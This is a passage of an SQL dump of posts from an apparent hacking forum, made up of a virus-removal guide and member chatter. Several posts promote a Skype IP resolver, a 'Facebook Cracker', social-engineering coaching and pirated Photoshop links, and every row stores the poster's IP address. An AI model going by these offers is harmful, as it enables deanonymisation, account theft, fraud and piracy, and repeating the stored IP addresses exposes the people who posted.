finish. It will load.\r\nThen it will give you two boxes. Click create a registry back up. Let it do its thing. Then click next and click start using program now. Click search for updates. Click any of the options with your country’s flag next to it, as it downloads the virus database from that server making it faster in your country.\r\n[img]http://i1168.photobucket.com/albums/r493/SuaveSalmon/spybotsd.png[/img]\r\nCheck off the options in the picture above.\r\nThen click download. It will download. Once done go to the immunize tab on the main bar (shown in the picture below).\r\n[img]http://i1168.photobucket.com/albums/r493/SuaveSalmon/dsfdsg.png[/img]\r\nClose all browsers and click immunize. While it is immunizing go to the search and destroy bar./tab Click on check for problems. It may say you have some temp files and it wants to delete them so just click yes and let it scan. When it is completed you will get some options. Put a check next to all the options and fix selected problems. Now I recommend re-scan but not crucial.\r\n\r\nStep 6/Recommended: Download Vulcan\'s virus scanner http://adf.ly/7IKG6 The great member ???Mephobia made this amazing scanner! Few things to note: This is a homemade/handmade scanner, you will not find a tool like this, and it is free forever. It gives you a popup when you open it and a popup when its done scanning. Here is what the GUI looks like when you are done scanning \r\n[img]http://i1168.photobucket.com/albums/r493/SuaveSalmon/Vulcan.png[/img]\r\nThis tool, Scans the whole system, has an Active Anti-Virus, has Quarantine List, has CPU Info, can Restore Regedit, CMD, Run, Folder Options, UAC, Hosts File, System Restore, and Task Manager (Scans are under 1 minute). Thread to his scanner http://www.hackforums.net/showthread.php?tid=2141173 . It is a great tool, I would recommend it!\r\n\r\nStep 7/Possibility: This step is not needed but recommended. There is a slight chance you may have a darkcomet R,A.T. If Vulcan\'s scanner didn\'t pick up on this then this is just an optional step! It is the darkcomet removal tool http://adf.ly/7IMvg It is a tool for removing another tool that can have someone else controlling your computer, also known as a R.A.T. You can get them from running any untrusted file! Download it, open up the darkcomet folder and run the .exe file \r\n[img]http://i1168.photobucket.com/albums/r493/SuaveSalmon/darkcometremoval.png[/img]\r\n Click scan, it may take a while to scan, then if it finds it, remove it. If it doesn\'t find anything then just click the fine button. There is a slight chance you could have the darkcomet rat out of the thousands of rats because it is a free program.\r\n\r\n[hr]\r\nStep 8: Get tdss killer. http://adf.ly/65pMT it removes rootkits. Click download and let it update itself. One that is done click change parameters. Then make sure everything has a check next to it. If you have any threats then click next or remove. Keep scanning until the rootkits are gone.\r\n[img]http://i1168.photobucket.com/albums/r493/SuaveSalmon/tdss.png[/img]\r\n\r\nStep recommended: Download Infested cleaner http://adf.ly/65T4x go to the botkill section, check advanced and click botkill \r\n[img]http://i1168.photobucket.com/albums/r493/SuaveSalmon/yes.png[/img]\r\nclick yes, \r\n\r\n click ok, \r\n[img]http://i1168.photobucket.com/albums/r493/SuaveSalmon/yes3.png[/img] \r\nthen hit ok. Bam you are done. This tool will kill most R.A.T.s and unauthorized programs running and prevent them from starting up.\r\n\r\nStep 9: Reboot your computer and enjoy it begin clean of viruses.\r\n\r\nPS: I took all these pictures on my personal computer!', '119.154.12.80', '2006584400', '1', '0', '54', '1345783961', '1', 'e5c5abeac26c5a42091ff2f2e97e510f', '0', '1345783961'); INSERT INTO mybb_posts VALUES('729', '164', '484', '28', 'RE: Experiences on your upgrade..', '0', '84', 'Thunder™', '1345784819', 'Thanks for Upgrade but i suggest u to change colour of username for elite', '111.91.95.190', '1868259262', '0', '0', '0', '0', '1', '0b7600d69055ae3041f53604169a3378', '0', '0'); INSERT INTO mybb_posts VALUES('730', '112', '571', '19', 'RE: ??? Ultimate Premium PPD Ebooks Give away ???', '0', '54', 'Sin Cara', '1345784821', '[quote=\'Apathy\' pid=\'571\' dateline=\'1345582636\']\r\nhit me up with this pack.\r\n[/quote]\r\n\r\n PPD ebooks pack is sent... check your pm now.', '196.28.57.72', '-1004783288', '1', '0', '0', '0', '1', 'ca5f78c4fb96e480974ab95facdc0999', '0', '0'); INSERT INTO mybb_posts VALUES('731', '111', '274', '29', 'RE: MyFreeCams Model Registeration', '0', '84', 'Thunder™', '1345784926', 'Thanks for share i will leave feedb4ack soon.', '111.91.95.190', '1868259262', '0', '0', '0', '0', '1', '6e6a13db17d650a4f47a107a8f7ce991', '0', '0'); INSERT INTO mybb_posts VALUES('732', '163', '483', '30', 'RE: [REAL]Facebook Cracker', '0', '84', 'Thunder™', '1345785439', 'Update the link please\nThanks man\n\nJakeUS edit: Don\'t spam, take this as a warning.', '111.91.95.190', '1868259262', '0', '0', '20', '1345822993', '1', '82df64d797835acc80c6a24ad8390714', '0', '1345822993'); INSERT INTO mybb_posts VALUES('733', '164', '729', '28', 'RE: Experiences on your upgrade..', '0', '1', 't3h jok3r', '1345811115', '[quote=\'Thunder™\' pid=\'729\' dateline=\'1345784819\']\r\nThanks for Upgrade but i suggest u to change colour of username for elite\r\n[/quote]\r\n\r\nThe non upgraded members username color is blue/cyan. Elite members username color is grey', '41.114.8.111', '695339119', '1', '0', '0', '0', '1', 'd7011ac1ccb78522dc2a28c454ac7410', '0', '0'); INSERT INTO mybb_posts VALUES('734', '191', '666', '15', 'RE: ProDos v1.0', '0', '67', 'HoverCatz', '1345811608', 'Its made in GameMaker O.o', '85.165.36.95', '1436886111', '1', '0', '0', '0', '1', '419f716461e98a8b5284591bd42cb660', '0', '0'); INSERT INTO mybb_posts VALUES('735', '202', '728', '25', 'RE: Virus Removal Guide! Pictures and step by step you can\'t fail!', '0', '67', 'HoverCatz', '1345812836', 'Fix the DarkCometRemover link :s', '85.165.36.95', '1436886111', '1', '0', '67', '1345812848', '1', '6bac201ca8f392b280526c60d61e88ec', '0', '1345812848'); INSERT INTO mybb_posts VALUES('736', '164', '484', '28', 'RE: Experiences on your upgrade..', '0', '67', 'HoverCatz', '1345812993', 'Yeah, switch colors for Member and Elite.', '85.165.36.95', '1436886111', '1', '0', '0', '0', '1', '4e5904912d4eae0271df57f5affba134', '0', '0'); INSERT INTO mybb_posts VALUES('927', '230', '925', '34', 'RE: Graphics Resources [100000\'s of free resorces]', '0', '54', 'Sin Cara', '1345918052', 'Tell me the links.... i think all are fine ;)', '173.245.53.115', '-1376438925', '1', '0', '0', '0', '1', '131695eb24cda16a2ad9806eeec087d5', '0', '0'); INSERT INTO mybb_posts VALUES('738', '184', '683', '35', 'RE: [Video] I\'m a video editor!', '0', '82', 'iTzIpod', '1345813903', '[quote=\'NXK\' pid=\'683\' dateline=\'1345757794\']\r\n[quote=\'iTzIpod\' pid=\'671\' dateline=\'1345749808\']\r\n[quote=\'NXK\' pid=\'660\' dateline=\'1345738559\']\r\n[quote=\'iTzIpod\' pid=\'657\' dateline=\'1345730483\']\r\nIt\'s alright. Also, if I ever got a video I need edited, I will come to you. =]\r\n\r\n\r\nWhat game is this?\r\n\r\nAlso, what system? PS3, Xbox 360, PC?\r\n[/quote]\r\n\r\nIt\'s counter strike source for PC\r\n[/quote]\r\n\r\n\r\n\r\nOh. Do you have a HDPVR with a Xbox 360 or Ps3 with CoD Games? :p\r\n[/quote]\r\n\r\n\r\nNo I do not. The only footage I edit of console games is pre recorded.\r\n[/quote]\r\n\r\nOh alright. I\'ll find someone with a HDPVR to record one of my games. :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '5de55416ef06eefddd62df7247264367', '0', '0'); INSERT INTO mybb_posts VALUES('739', '203', '0', '16', '[Limited] Free SEing Help', '0', '82', 'iTzIpod', '1345814261', 'Hey LH,\nI will be offering a Limited Edition help. (I don\'t know what to call this thread. -.-) Meh. \n\nI am going to TeamViewer you & Skype with you. And I will assist you with SEing from any company. Please note that if you get caught, I am not responsible. I will only do this for the first 3 members that post here.\n\nDon\'t post \"Oh, good luck\" or something like that. Only post if you are interested.\n\nI have many methods on how to SE. So I\'m pretty sure my knowledge is decent.\n\nAlso Note: Just because I am helping you, doesn\'t mean I\'m going to do all of the work. And, you might fail. My methods are not 100% foolproof.', '24.212.197.164', '416597412', '1', '0', '82', '1351894688', '1', 'f67a8a59e0ef23ce8b4126ba0adbfc2f', '0', '1351894688'); INSERT INTO mybb_posts VALUES('740', '201', '727', '42', 'RE: Lance armstrong stripped of 7 tour titles?', '0', '82', 'iTzIpod', '1345814819', 'That is too much too read! :?:', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e3362c7b5f4f1e5764401f7698063757', '0', '0'); INSERT INTO mybb_posts VALUES('741', '204', '0', '29', '[FREE]Skype Resolver API', '0', '1', 't3h jok3r', '1345816344', '[align=center][font=Segoe UI][size=xx-large][color=white][b][u]L33THacking\'s Skype Resolver API Giveaway[/u][/b][/color][/size][/align]\r\n\r\n[size=medium][list][b]Information[/b]\r\n[list]This will resolve an online Skype username and give you the IP.[/list]\r\n\r\n[b]How To Get[/b]\r\n[list]Post on this thread\r\n[/size][/list]\r\n\r\n[/font][/list]', '41.151.175.246', '697806838', '1', '0', '0', '0', '1', '864e6b3d501010e0a5f13fd90d62f4d6', '0', '0'); INSERT INTO mybb_posts VALUES('742', '163', '732', '30', 'RE: [REAL]Facebook Cracker', '0', '5', 'Timmy', '1345816882', '[quote=\'Thunder™\' pid=\'732\' dateline=\'1345785439\']\r\nUpdate the link please\r\n25 charac\r\n[/quote]\r\n\r\nThe link works for me and i reported you for LQP.', '41.151.175.246', '697806838', '1', '0', '0', '0', '1', '901f3af50143eb8d0a61f901846d4f66', '0', '0'); INSERT INTO mybb_posts VALUES('743', '205', '0', '53', 'First Java Multiplayer \"Game\"', '0', '67', 'HoverCatz', '1345817135', 'Hey :D\nI made my first Java Multiplayer game, but only Movement works.\nTell me what u think :o\n\nYou need to portforward if you want to host it so others can connect :P\n\n[b]DOWNLOADS:[/b]\nServer: [url=https://dl.dropbox.com/u/33062220/Blocks%20-%20Server.jar]Here[/url]\nClient: [url=https://dl.dropbox.com/u/33062220/Blocks%20-%20Multiplayer.jar]Here[/url]\n\n[b]Screenshot[/b]:\nServer:\n[img]http://gyazo.com/5520d3df6647a536c494133997ce6385.png[/img]\nClient:\n[img]http://gyazo.com/3b88c21affa48305685c41f8a1345f58.png[/img]\n\nNOTE: Dont edit the files without asking me for permission.', '85.165.36.95', '1436886111', '1', '0', '67', '1345817444', '1', 'f304cba1abfc7c169e694c8f849a4224', '0', '1345817444'); INSERT INTO mybb_posts VALUES('744', '43', '105', '7', 'RE: How did you find us?', '0', '101', 'KFallen', '1345817254', 'I saw and add. I plan to be active.', '66.87.0.147', '1112998035', '0', '0', '0', '0', '1', '5eacd9c39346a4d7b05f3f17171f8c39', '0', '0'); INSERT INTO mybb_posts VALUES('765', '187', '764', '3', 'RE: Public Downloads?', '0', '1', 't3h jok3r', '1345822138', '[quote=\'iTzIpod\' pid=\'764\' dateline=\'1345821801\']\r\n[quote=\'t3h jok3r\' pid=\'684\' dateline=\'1345758374\']\r\nI actually agree with R?????zo? and iTzIpod. We currently need activity and need some bumps on good giveaways and tutorials as well.\r\n[/quote]\r\n\r\nSo are you going to deny or accept this suggestion?\r\n[/quote]\r\n\r\nI\'m going to sadly deny my own suggestion. \r\n\r\nHey I just found out that LH doesn\'t have a crying smiliey.', '41.151.195.186', '697811898', '1', '0', '0', '0', '1', '0cfc620efc623f596d8bba77c04d1001', '0', '0'); INSERT INTO mybb_posts VALUES('746', '200', '723', '55', 'RE: [Request] Adobe Photoshop CS6 Portable', '0', '1', 't3h jok3r', '1345817347', 'http://dl.dropbox.com/u/26951938/Photoshop.rar \n\nIt\'s CS5 though, also It\'s clean. I checked the virus total scan before downloading and the sandbox control panel seems to be OK.\n\nENJOY!', '41.151.175.246', '697806838', '1', '0', '0', '0', '1', '7e901dc9de979d3e540c2ddce04bfa65', '0', '0'); INSERT INTO mybb_posts VALUES('747', '31', '86', '7', 'RE: How long are you online daily?', '0', '101', 'KFallen', '1345817434', '2-4 on school days. 5-16 on summer days.', '66.87.0.147', '1112998035', '0', '0', '0', '0', '1', 'acdacd5f922315d4da1df75507a5f1bd', '0', '0'); INSERT INTO mybb_posts VALUES('748', '78', '187', '7', 'RE: Dota 2 beta keys giveawat!', '0', '101', 'KFallen', '1345817602', 'I would also like to know what Dota 2 is.', '66.87.0.147', '1112998035', '0', '0', '0', '0', '1', '9e365be7beccef563fce06148a96b982', '0', '0'); INSERT INTO mybb_posts VALUES('749', '31', '86', '7', 'RE: How long are you online daily?', '0', '82', 'iTzIpod', '1345817656', 'I got school soon and so I won\'t be as active as I am now. \n\nProbably on Weekdays - 3-4 hours.\nWeekends - 5-7 hours.\n\n\n20 Hours Online so far. =]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '556ee9f54906fc23ffddb1124f12a9fa', '0', '0'); INSERT INTO mybb_posts VALUES('750', '191', '666', '15', 'RE: ProDos v1.0', '0', '53', 'sirchamp', '1345817747', 'No it\'s not. Why do you think that. Its a normal GUI', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '0aa66a3472a748e9ca665b71d12fd786', '0', '0'); INSERT INTO mybb_posts VALUES('751', '204', '741', '29', 'RE: [FREE]Skype Resolver API', '0', '67', 'HoverCatz', '1345817777', 'Omg haha This is exactly wut i need :o', '85.165.36.95', '1436886111', '1', '0', '0', '0', '1', '3d4e83cf073f7b8f73a4f184a486e2bc', '0', '0'); INSERT INTO mybb_posts VALUES('752', '171', '528', '8', 'RE: What Genre do you listen to?', '0', '101', 'KFallen', '1345817788', 'Mostly EXTREME POWER METAL!, dubstep, techno. But I also listen to heavy metal, death metal, thrash metal, but not as much as I used to.', '66.87.0.147', '1112998035', '0', '0', '0', '0', '1', '8eb320d6d0553f65edd1c4857844e69f', '0', '0'); INSERT INTO mybb_posts VALUES('753', '200', '746', '55', 'RE: [Request] Adobe Photoshop CS6 Portable', '0', '82', 'iTzIpod', '1345818053', '[quote=\'t3h jok3r\' pid=\'746\' dateline=\'1345817347\']\r\nhttp://dl.dropbox.com/u/26951938/Photoshop.rar \r\n\r\nIt\'s CS5 though, also It\'s clean. I checked the virus total scan before downloading and the sandbox control panel seems to be OK.\r\n\r\nENJOY!\r\n[/quote]\r\n\r\nIs it Portable? :3 Or just the regular Adobe Photoshop CS5? Or Extended? Etc.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '23938876f17242c012b74bf70f99446e', '0', '0'); INSERT INTO mybb_posts VALUES('754', '17', '46', '8', 'RE: My Dubstep Remixs', '0', '101', 'KFallen', '1345818109', 'The beats are pretty good, but I just don\'t like rap.....', '66.87.0.147', '1112998035', '0', '0', '0', '0', '1', '2bc4aeb6ffb786756207bc43fe2d62ef', '0', '0'); INSERT INTO mybb_posts VALUES('755', '179', '593', '34', 'RE: [tut] Multiple 3D text tutorials', '0', '1', 't3h jok3r', '1345818297', 'No problem, Enjoy and good luck with your 3D text', '41.151.175.246', '697806838', '1', '0', '0', '0', '1', '776164ff61c2d4bf92434c69de75a039', '0', '0'); INSERT INTO mybb_posts VALUES('756', '202', '728', '25', 'RE: Virus Removal Guide! Pictures and step by step you can\'t fail!', '0', '101', 'KFallen', '1345818833', 'Good thing I already had many of these.', '66.87.0.147', '1112998035', '0', '0', '0', '0', '1', 'ba0daf8c2a3a3ddf2576c47926a5fe33', '0', '0'); INSERT INTO mybb_posts VALUES('757', '201', '727', '42', 'RE: Lance armstrong stripped of 7 tour titles?', '0', '1', 't3h jok3r', '1345819163', 'Too much to read but I got the Idea. I\'m sure 90% athletes do drugs (Ex: Steroids) or some other kind to get more energy to cheat.', '41.151.195.186', '697811898', '1', '0', '0', '0', '1', '765c381110e02ae062809147d6212113', '0', '0'); INSERT INTO mybb_posts VALUES('758', '171', '528', '8', 'RE: What Genre do you listen to?', '0', '82', 'iTzIpod', '1345819985', '@KFallen you must listen to a lot of songs. I dislike metal though. Sorry! :d', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'eb885ff04c78096cffcde3110b5c8169', '0', '0'); INSERT INTO mybb_posts VALUES('759', '189', '652', '49', 'RE: Webmaster Section', '0', '1', 't3h jok3r', '1345820324', 'Thanks for understanding, I will add the section but in a few weeks.', '41.151.195.186', '697811898', '1', '0', '0', '0', '1', '84442c06cc6ea7ec9e4f01f6d08f6abe', '0', '0'); INSERT INTO mybb_posts VALUES('760', '201', '757', '42', 'RE: Lance armstrong stripped of 7 tour titles?', '0', '82', 'iTzIpod', '1345820478', '[quote=\'t3h jok3r\' pid=\'757\' dateline=\'1345819163\']\r\nToo much to read but I got the Idea. I\'m sure 90% athletes do drugs (Ex: Steroids) or some other kind to get more energy to cheat.\r\n[/quote]\r\n\r\nAgreed. All I wanna know is how they don\'t get caught :3', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '33eded5e295fe16430612178c0478cd7', '0', '0'); INSERT INTO mybb_posts VALUES('761', '78', '187', '7', 'RE: Dota 2 beta keys giveawat!', '0', '82', 'iTzIpod', '1345820653', '[url=http://en.wikipedia.org/wiki/Dota_2] Dota 2 Wiki[/url]\nIt takes like 5 seconds just to open up a new tab and Google search \"Dota 2\"', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '910a54ea5ad5787cd1d3749bc8194f14', '0', '0'); INSERT INTO mybb_posts VALUES('762', '196', '703', '3', 'RE: IMPORTANT ANNOUNCEMENT!!!', '0', '82', 'iTzIpod', '1345821490', '[quote=\'t3h jok3r\' pid=\'703\' dateline=\'1345768309\']\r\n[quote=\'iTzIpod\' pid=\'701\' dateline=\'1345767787\']\r\n[quote=\'t3h jok3r\' pid=\'699\' dateline=\'1345767008\']\r\n[quote=\'iTzIpod\' pid=\'698\' dateline=\'1345766825\']\r\n@NXK, yeah.. I could barely access the forum at like 10:00 PM - 12:00 AM..\r\n[/quote]\r\n\r\nNot just that. LH loses members and posts, it\'s frustrating especially for me when I\'m adding something and the server goes down. Plus if Google or any other bot/spider caches a down page, it\'s bad SEO.\r\n[/quote]\r\n\r\nTrue. But hopefully this new host migration will have better host than this current one. \r\n\r\nBy the way may I ask which host we are currently using?\r\n[/quote]\r\n\r\nSorry I can not say what host we are currently on due to some security reasons. But after the migrating I will surely let you know, my hosting I\'m on now is fairly new and kinda cheap but our new host has been out there for 3+ years with good reviews.\r\n[/quote]\r\n\r\nOh. Alright :) What about this new host? :3', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '7f8b047c2f1b72675110c909e13bbd13', '0', '0'); INSERT INTO mybb_posts VALUES('763', '43', '627', '7', 'RE: How did you find us?', '0', '1', 't3h jok3r', '1345821692', '[quote=\'iTzIpod\' pid=\'627\' dateline=\'1345668585\']\r\nWhat? What do you mean took my username? :o\r\n[/quote]\r\n\r\nYou said \"I\'m from t3h jok3r\"', '41.151.195.186', '697811898', '1', '0', '0', '0', '1', '001381d656c4931f77ee2470120bbdb3', '0', '0'); INSERT INTO mybb_posts VALUES('764', '187', '684', '3', 'RE: Public Downloads?', '0', '82', 'iTzIpod', '1345821801', '[quote=\'t3h jok3r\' pid=\'684\' dateline=\'1345758374\']\r\nI actually agree with R?????zo? and iTzIpod. We currently need activity and need some bumps on good giveaways and tutorials as well.\r\n[/quote]\r\n\r\nSo are you going to deny or accept this suggestion?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'cc085b9b95a91f33c3504e57df90cd5c', '0', '0'); INSERT INTO mybb_posts VALUES('766', '196', '762', '3', 'RE: IMPORTANT ANNOUNCEMENT!!!', '0', '1', 't3h jok3r', '1345822280', '[quote=\'iTzIpod\' pid=\'762\' dateline=\'1345821490\']\r\n[quote=\'t3h jok3r\' pid=\'703\' dateline=\'1345768309\']\r\n[quote=\'iTzIpod\' pid=\'701\' dateline=\'1345767787\']\r\n[quote=\'t3h jok3r\' pid=\'699\' dateline=\'1345767008\']\r\n[quote=\'iTzIpod\' pid=\'698\' dateline=\'1345766825\']\r\n@NXK, yeah.. I could barely access the forum at like 10:00 PM - 12:00 AM..\r\n[/quote]\r\n\r\nNot just that. LH loses members and posts, it\'s frustrating especially for me when I\'m adding something and the server goes down. Plus if Google or any other bot/spider caches a down page, it\'s bad SEO.\r\n[/quote]\r\n\r\nTrue. But hopefully this new host migration will have better host than this current one. \r\n\r\nBy the way may I ask which host we are currently using?\r\n[/quote]\r\n\r\nSorry I can not say what host we are currently on due to some security reasons. But after the migrating I will surely let you know, my hosting I\'m on now is fairly new and kinda cheap but our new host has been out there for 3+ years with good reviews.\r\n[/quote]\r\n\r\nOh. Alright :) What about this new host? :3\r\n[/quote]\r\n\r\nUmm, it\'s fast and we will migrate before Saturday.', '41.151.195.186', '697811898', '1', '0', '0', '0', '1', '48d0655126b75658ef6825b7649ba098', '0', '0'); INSERT INTO mybb_posts VALUES('767', '196', '766', '3', 'RE: IMPORTANT ANNOUNCEMENT!!!', '0', '82', 'iTzIpod', '1345822689', '[quote=\'t3h jok3r\' pid=\'766\' dateline=\'1345822280\']\r\n[quote=\'iTzIpod\' pid=\'762\' dateline=\'1345821490\']\r\n[quote=\'t3h jok3r\' pid=\'703\' dateline=\'1345768309\']\r\n[quote=\'iTzIpod\' pid=\'701\' dateline=\'1345767787\']\r\n[quote=\'t3h jok3r\' pid=\'699\' dateline=\'1345767008\']\r\n\r\nNot just that. LH loses members and posts, it\'s frustrating especially for me when I\'m adding something and the server goes down. Plus if Google or any other bot/spider caches a down page, it\'s bad SEO.\r\n[/quote]\r\n\r\nTrue. But hopefully this new host migration will have better host than this current one. \r\n\r\nBy the way may I ask which host we are currently using?\r\n[/quote]\r\n\r\nSorry I can not say what host we are currently on due to some security reasons. But after the migrating I will surely let you know, my hosting I\'m on now is fairly new and kinda cheap but our new host has been out there for 3+ years with good reviews.\r\n[/quote]\r\n\r\nOh. Alright :) What about this new host? :3\r\n[/quote]\r\n\r\nUmm, it\'s fast and we will migrate before Saturday.\r\n[/quote]\r\n\r\n\r\nCan you tell me what host we are going to use? Or is that a no no?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'c077fa8016c216a28785fbb5473cb711', '0', '0'); INSERT INTO mybb_posts VALUES('768', '43', '763', '7', 'RE: How did you find us?', '0', '82', 'iTzIpod', '1345822951', '[quote=\'t3h jok3r\' pid=\'763\' dateline=\'1345821692\']\r\n[quote=\'iTzIpod\' pid=\'627\' dateline=\'1345668585\']\r\nWhat? What do you mean took my username? :o\r\n[/quote]\r\n\r\nYou said \"I\'m from t3h jok3r\"\r\n[/quote]\r\n\r\nOh. I meant it as in you referred me :3 Since I came from TP. And your username is L33t Hacking on TP.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '0779da38edbe8d87702589059591d368', '0', '0'); INSERT INTO mybb_posts VALUES('769', '206', '0', '7', 'Apply for SWAG', '0', '67', 'HoverCatz', '1345823845', 'Yo, this is me behind my mask;\n\n[img]https://dl.dropbox.com/u/33062220/snapshot.jpg[/img]\nLooks better with a Black hoodie', '85.165.36.95', '1436886111', '1', '0', '67', '1345823884', '1', '8db363631c9dbd0ea2bbc0e9127e3384', '0', '1345823884'); INSERT INTO mybb_posts VALUES('770', '206', '769', '7', 'RE: Apply for SWAG', '0', '82', 'iTzIpod', '1345824220', 'Nice mask. Why are you holding a piece of paper with the number 67? :o \n\nIn the shape of a diamond I guess :p \n\n\n\n\nSWAG', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '444f1b0fdb755c0c08eb2509d55eeff3', '0', '0'); INSERT INTO mybb_posts VALUES('771', '206', '769', '7', 'RE: Apply for SWAG', '0', '67', 'HoverCatz', '1345824278', 'Its my UID :)', '85.165.36.95', '1436886111', '1', '0', '0', '0', '1', '69fc0d3f4d42107c71fce4e51a913b65', '0', '0'); INSERT INTO mybb_posts VALUES('772', '206', '771', '7', 'RE: Apply for SWAG', '0', '82', 'iTzIpod', '1345824329', '[quote=\'HoverCatz\' pid=\'771\' dateline=\'1345824278\']\r\nIts my UID :)\r\n[/quote]\r\n\r\nOh. I didn\'t realize that :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'cda3f00e455bdccbba9f7efbb22755bf', '0', '0'); INSERT INTO mybb_posts VALUES('773', '197', '696', '56', 'RE: /me Thread', '0', '67', 'HoverCatz', '1345825312', '/me is an awesome Java coder!', '85.165.36.95', '1436886111', '1', '0', '0', '0', '1', '8a9c83adac782e4a93aba7458824511c', '0', '0'); INSERT INTO mybb_posts VALUES('774', '200', '723', '55', 'RE: [Request] Adobe Photoshop CS6 Portable', '0', '2', 'Apathy', '1345825644', 'Torrent his:\n\nmagnet:?xt=urn:btih:1F70593D167F733FFB3093673EE86E850525FAB0&dn=Adobe%20Photoshop%20CS6%2013.0%20Multilingual%20%28Portable%29&tr=udp%3a//tracker.openbittorrent.com%3a80\n\nIt is working and is cs6 portable.\n\nSeems clean but runs amazingly in sandboxie.', '70.53.236.250', '1177939194', '0', '0', '0', '0', '1', '787193ad1e01e248d42bdbc0385e9764', '0', '0'); INSERT INTO mybb_posts VALUES('775', '197', '696', '56', 'RE: /me Thread', '0', '2', 'Apathy', '1345825750', '/me is the best admin right.....', '70.53.236.250', '1177939194', '0', '0', '2', '1345825760', '1', 'db115da38e8f4976076b742594e1b763', '0', '1345825760'); INSERT INTO mybb_posts VALUES('776', '207', '0', '3', 'Suggest awards and apply for awards', '0', '2', 'Apathy', '1345825880', 'Well guys we like knowing what the community wants so suggest away for awards that should be added. Also if you think you deserve a award post here explaining why.\r\n\r\nGOGOGOGO:cool:', '70.53.236.250', '1177939194', '0', '0', '1', '1345936555', '1', '965684874a399a653721fdb7672488c4', '0', '1345936555'); INSERT INTO mybb_posts VALUES('777', '187', '640', '3', 'RE: Public Downloads?', '0', '2', 'Apathy', '1345826015', 'I think maybe a post to see download link option, so it does not have to be used but can be used at the discretion of the user.', '70.53.236.250', '1177939194', '0', '0', '0', '0', '1', 'e1386b37f3c399033e831ccc4eef3b8d', '0', '0'); INSERT INTO mybb_posts VALUES('778', '205', '743', '53', 'RE: First Java Multiplayer \"Game\"', '0', '2', 'Apathy', '1345826081', 'Looks nice have not downloaded it though. What do you do in it...', '70.53.236.250', '1177939194', '0', '0', '0', '0', '1', 'c217bdfe571ecf535b8e04dee4ff286a', '0', '0'); INSERT INTO mybb_posts VALUES('779', '43', '105', '7', 'RE: How did you find us?', '0', '2', 'Apathy', '1345826158', 'I helped start it with you... :P', '70.53.236.250', '1177939194', '0', '0', '0', '0', '1', 'c360accb1d593e6cc4af408efe4a7565', '0', '0'); INSERT INTO mybb_posts VALUES('780', '197', '696', '56', 'RE: /me Thread', '0', '82', 'iTzIpod', '1345827302', '/me is currently playing a RSPS.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '003436e800ef5db9588c5bc37ca7bc3f', '0', '0'); INSERT INTO mybb_posts VALUES('781', '207', '776', '3', 'RE: Suggest awards and apply for awads.', '0', '82', 'iTzIpod', '1345827486', 'Award Name: Newbie Hacker\nAward Description: This award is very prestigious to Newbies. \nHow to obtain award: Have a total of 1 day time spent online!\nAward Icon: [img]http://img545.imageshack.us/img545/7172/premiumuse1.png[/img] Resize it and make it transparent if you want. \n\n\nSomething like that', '24.212.197.164', '416597412', '1', '0', '82', '1345849151', '1', '9c36cb5cbcf37476627e1d68885a6883', '0', '1345849151'); INSERT INTO mybb_posts VALUES('782', '202', '728', '25', 'RE: Virus Removal Guide! Pictures and step by step you can\'t fail!', '0', '54', 'Sin Cara', '1345828423', 'Thanks for the comments ;)', '173.245.53.157', '-1376438883', '1', '0', '0', '0', '1', 'bce684a61ae9267672d5586991a31537', '0', '0'); INSERT INTO mybb_posts VALUES('783', '197', '696', '56', 'RE: /me Thread', '0', '67', 'HoverCatz', '1345829476', '/me is wondering what rsps iTzIpod is playing', '85.165.36.95', '1436886111', '1', '0', '0', '0', '1', '24baefac6a98e7683fd281a97145d190', '0', '0'); INSERT INTO mybb_posts VALUES('784', '201', '760', '42', 'RE: Lance armstrong stripped of 7 tour titles?', '0', '61', 'NXK', '1345829671', '[quote=\'iTzIpod\' pid=\'760\' dateline=\'1345820478\']\n[quote=\'t3h jok3r\' pid=\'757\' dateline=\'1345819163\']\nToo much to read but I got the Idea. I\'m sure 90% athletes do drugs (Ex: Steroids) or some other kind to get more energy to cheat.\n[/quote]\n\nAgreed. All I wanna know is how they don\'t get caught :3\n[/quote]\n\nCertain steroids can be flushed from your system fast, It just depends how fast the athlete needs them out of his system.\n\nit just depends what kind of steroid they\'re using.', '99.253.65.17', '1677541649', '0', '0', '61', '1345831747', '1', '033904ef5e2d304a6c84d1b9803b29a6', '0', '1345831747'); INSERT INTO mybb_posts VALUES('785', '187', '640', '3', 'RE: Public Downloads?', '0', '61', 'NXK', '1345830030', 'I think JakeUS has the best idea, They have to post something with over 20 charecters in order to see the download link.', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', '19b83761a7cf57b51f15e11302bf2a93', '0', '0'); INSERT INTO mybb_posts VALUES('786', '104', '251', '33', 'RE: Photoshop vs Gimp', '0', '20', 'JakeUS', '1345830603', 'Photoshop is definatly better.', '24.59.243.229', '406582245', '1', '0', '0', '0', '1', 'feddce1a3f010cc34809eb76e1e99c6f', '0', '0'); INSERT INTO mybb_posts VALUES('787', '197', '783', '56', 'RE: /me Thread', '0', '82', 'iTzIpod', '1345831283', '[quote=\'HoverCatz\' pid=\'783\' dateline=\'1345829476\']\n* HoverCatz is wondering what rsps iTzIpod is playing\n[/quote]\n\n/me is playing le [url=http://www.deznation.ca]DezNation RSPS[/url] =]\n\nIt is my friend\'s RSPS. Some minor bugs. But still an awesome server.\n\n(Click on DezNation RSPS)', '24.212.197.164', '416597412', '1', '0', '82', '1345831332', '1', '56ca37a24b0a3511d14b8ad783e41553', '0', '1345831332'); INSERT INTO mybb_posts VALUES('788', '208', '0', '7', 'I m feeling happy ;)', '0', '54', 'Sin Cara', '1345831427', 'I m feeling very happy because i just left Hackforums and started my work here. Its really awesome forum.\r\n\r\nBest of luck for this forum;)\r\n\r\n\r\nRegards\r\nSin Cara', '119.154.24.194', '2006587586', '1', '0', '0', '0', '1', 'aad0bbc9b005ed9366d5539aff7eb0b5', '0', '0'); INSERT INTO mybb_posts VALUES('789', '201', 